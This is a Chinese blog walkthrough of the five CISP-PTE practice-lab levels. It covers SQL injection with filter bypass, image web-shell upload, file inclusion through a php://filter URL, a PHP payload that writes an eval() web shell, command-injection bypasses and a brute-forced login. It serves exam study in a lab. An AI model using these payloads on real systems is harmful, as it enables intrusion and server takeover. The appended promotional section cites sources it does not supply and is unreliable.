CISP-PTE 靶场攻略+笔记

目录

第一关,SQL注入

展示效果

判断字段数

使用load_file()可以查看到本地的文件

第二关,文件上传

制作图片🐎

访问🐎上传的url地址

shell连接

第三关,文件包含漏洞

​编辑

发现key.php

尝试伪协议注入

简单粗暴,接下来就是base64解码

也可以使用input协议

写入payload

第四关,命令执行

payload构造

开始尝试

检查源码

第五关,日志分析

尝试爆破

登录成功


第一关,SQL注入

%0a:表示一个空格

%23:表示一个#号(#号的作用是注释掉后面的内容

展示效果

判断字段数

判断出字段数为4

使用联合查询union select 进行下一步

好小子,居然还有过滤

怎么绕过可以参考这个文章

发现套娃的方式可以绕过

使用load_file()可以查看到本地的文件

如果有小伙伴跟我刚开始一样不明白为什么知道这个路径还有文件存放的位置,你可以看看home页

第二关,文件上传

可以看见jpg格式可以上传成功,我们尝试写一个图片🐎

制作图片🐎

copy /b 123.jpg+info.php shell.jpg

文件上传绕过文章

成功绕过,猜测是黑名单

访问🐎上传的url地址

shell连接

测试了一堆,发现就这个可以连接🤷‍♂️

开始找文件咯

第三关,文件包含漏洞

能看见passwd文件

发现key.php

问题,怎么看见这个里面的内容?

参考这篇文章

尝试伪协议注入

http://192.168.100.20:83/vulnerabilities/fu1.php?file=php://filter/read=convert.base64-encode/resource=../key.php

简单粗暴,接下来就是base64解码

也可以使用input协议

这里看见可以写入

写入payload

<?php fputs(fopen('shell.php', 'w'),'<?php eval($_POST[xxx]); ?>'); ?>

第四关,命令执行

payload构造

参考文献

开始尝试

命令中间加\可以绕过

中间加$1可以绕过 

就不一一尝试了,够用就行

检查源码

第五关,日志分析

发现了login

尝试爆破

发现密码是password123

登录成功

### 关于CISP-PTE认证360公司靶场资源 对于希望参与CISP-PTE认证并获取实践机会的学习者来说,了解可用的在线靶场至关重要。360公司在网络安全领域提供了丰富的学习资源和支持环境。 #### 360安全学院提供的CISP-PTE培训服务 360安全学院作为官方授权培训机构之一,不仅提供理论课程讲解,还特别设立了针对CISP-PTE考生的实际操作练习平台[^1]。该平台上包含了多种类型的实验场景,旨在帮助学员熟悉各类渗透测试技巧和技术细节,特别是文件上传漏洞利用等方面的知识点[^3]。 #### 实验室特色功能介绍 - **真实网络环境模拟**:通过构建贴近真实的Web应用和服务端架构,使参与者能够在一个受控环境中体验到接近实战的操作流程。 - **多样化挑战题目设置**:涵盖了从基础的信息收集到最后阶段的应用层攻击等多个环节的任务设计,其中就包括了对特定IP地址下的异常流量分析以及可能存在的管理后台探测等内容[^2]。 - **针对性技术指导材料**:除了动手实操外,还会配套详细的文档说明和技术要点解析,比如如何绕过某些字符限制来实现恶意脚本注入等高级玩法提示[^4]。 为了更好地准备CISP-PTE考试并通过实际操作加深理解,建议访问360安全学院官方网站查询最新的课程安排和实验室开放情况,并积极参与其中的各项活动以提升个人技能水平。 ```bash curl http://example.com/path?param=value%23comment -X GET ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值